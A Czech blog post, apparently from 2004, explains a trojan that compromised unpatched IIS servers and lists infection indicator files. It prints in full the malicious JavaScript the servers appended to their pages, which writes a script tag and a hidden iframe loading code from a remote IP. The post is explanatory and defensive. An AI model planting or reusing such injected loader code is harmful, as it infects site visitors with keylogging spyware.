Virus na renomovaných serverech?
Na různých serverech po světě (u nás zatím moc ne), se objevila senzační zpráva, že se objevil zcela nový virus napadající počítače přímo z obrázků. Zas tak dramatické to samozřejmě není, ale způsob, jaký tento trojský kůň používá, je celkem zajímavý. Nejste už náhodou také napadeni?
Nákazu poznáte tak, že v počítači najdete jeden ze souborů Kk32.dll nebo Surf.dat. Je-li tomu tak, pak dezinfekci najdete na specializovaných stránkách firem Symantec, F-Secure nebo Computer Associates. To bychom měli to nejdůležitější. Ale pojďme se podívat, o co vlastně jde.
Tato tajemná nákaza napadá servery s MS IIS neošetřené záplatou popsanou v Microsoft Security Bulletinu MS04-011. Tento napadený server pak posílá v patičce stránek JavaScript zneužívající chyby v neopraveném MS IE. Tento klientem spuštěný script pak komunikuje s 217.107.218.147 (díky zásahu MS už nefunkční), kde následně spouští další programy (MSITS.EXE, ...). Instalovaný spyware obsahuje keyloger a sbírá informace z formulářů. Data pak posílá na uvedenou adresu. Je tedy klidně možné objevit i ledasjakou zajímavou informaci, kterou jste na klávesnici naklapali.
Jsem si jist, že hoříte touhou spatřit onen kód. Tady je!
<script language="JavaScript">
<!-- var qxco7=document.cookie;
function gc099(n21){var ix=qxco7.indexOf(n21+"=");
if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;
var es=qxco7.indexOf (";",ix);
if(es==-1)es=qxco7.length;return unescape (qxco7.substring(ix,es));},
function sc088(n24,v8){var today=new Date();
var expiry=new Date(today.getTime() +600000);
if(v8!=null&&v8!="") document.cookie=n24+"="+escape(v8)+";
expires="+expiry.toGMTString();qxco7=document.cookie;}
function okx12(){window.status="";
setTimeout("okx12()",200);}
okx12();
if(location.href.indexOf("https")!=0)
{if (gc099("trk716")==null){document.write
("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script>
<iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
sc088 ("trk716","4");}}// --></script>
Ještě se vrátím k tomu IIS serveru. Jeho správce virus odhalí tak, že na něm najde soubory ftpcmd.txt, agent.exe a ads.vbs, případně iisXXX.dll, kde XXX jsou náhodná čísla a znaky.
Celkem podrobně se do rozboru pustil Medvídek Pů. Tam najdete aktualizované informace, tak jak se postupně po světě objevují i další podrobnosti.
Ještě si neodpustím odkaz na text ve Finančních novinách. Píší tam: "Jiní experti však podle AP doporučují prozatím vyhnout se browserům Microsoft Internet Explorer a používat alternativní prohlížeče jako Mozilla a Opera. Infekce také na prohlížeči Explorer nezasahuje verzi Macintosh pro počítače firmy Apple."
Tím jistě udělám radost nejednomu NEuživateli IE a určitě tu zase rozjedete slušnou diskusi na téma IE vs. Opera vs. Mozilla.
